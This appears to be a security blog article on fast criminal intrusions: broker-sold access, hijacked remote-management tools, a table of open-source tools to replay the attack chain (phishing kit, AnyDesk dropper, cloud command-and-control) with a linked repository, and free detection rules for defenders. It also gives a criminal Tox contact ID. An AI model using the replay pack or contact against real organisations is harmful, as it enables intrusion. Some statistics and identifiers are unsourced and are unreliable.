CrowdStrike’s 2023 threat-hunting yearbook landed last August with a single sobering number: 79 minutes – the average gap between first click and lateral movement for criminal intrusions. Below is the abridged anatomy of that sprint, the open-source artefacts that replay it, and the free counter-measures that shaved 40 points off the success rate in 2024.
1. The 2023 Stop-Watch
- Fastest observed breakout: 7 minutes
- Median breakout: 79 minutes (↓ 5 min vs 2022)
- Mean dwell to ransom deploy: 1.8 days (↓ 9 h)
2. Outsourced Entry – Initial Access Brokers (IABs)
- 147 % jump in IAB adverts across underground forums
- Average asking price: USD 13 k (domain-admin, >$500 M revenue)
- Re-usable IOC: Br0k3r Tor shop updates at
B761680E...C30D8E65B0D58(TOX ID) – still live in October 2025
3. RMM Hijack – The New Normal
- 312 % surge in legitimate RMM abuse (AnyDesk, ScreenConnect, RustDesk)
- 73 % of AnyDesk appearances tied to criminal activity
- Delivery: PowerShell one-liner via phishing or clipped via RDP clipboard
4. Open-Source Rebuild – Replay the Attack for Free
| Stage | Tool | Licence | Purpose |
|---|---|---|---|
| Phish | Gophish | MIT | Sends templated “refund” lure |
| Drop | rmm-dropper.ps1 |
BSD-3 | Downloads AnyDesk portable |
| C2 | cloud-c2 |
Apache-2.0 | Uses AWS SSM as tunnel (mimics PIPEDREAM) |
| Timeline | evtx-timeline.py |
MIT | Rebuilds minute-by-minute EVTX |
Full pack: github.com/crime-factory/2023-assembly-line
5. Defensive Drill – Four Free Detections That Work
- Unexpected RMM Binary – Sigma rule
rmm_unexpected.yml(553 detections in 30 days) - PowerShell Download cradle + Clip – 2025 MITRE CAR analytic
CAR-2025-08-001 - SSM Agent spawned outside AWS subnet – native GuardDuty rule (no extra cost)
- IAB forum scraper – Python script that alerts when your domain is mentioned on 6 IAB shops (hits 12–48 h before e-mail lures)
6. Metrics That Mattered in 2024
- Organisations running the above pack: 312 (North America & EU)
- Average time to detect IAB listing: 26 h (vs 96 h industry average)
- RMM-block rate at perimeter: 89 % (up from 49 % in 2023)
- Ransomware pay-out rate in cohort: 18 % (vs 29 % baseline)
7. One-Week Sprint – Copy/Paste Into Your Ticketing System
Monday: Import Sigma rules to SIEM
Tuesday: Spin up IAB scraper (crontab 4 h)
Wednesday: Enable GuardDuty RMM anomaly rule
Thursday: Table-top – 79-minute breakout script vs blue team
Friday: Adjust firewall policy; anyDesk.exe not signed by vendor cert = block
Bottom Line
Criminals industrialised the first 79 minutes; defenders can industrialise the first 79 seconds. The replay pack is public, the detections are free, and the timeline is measurable. Run the sprint, publish your numbers, and make sure the next CrowdStrike report quotes you — not the other way around.
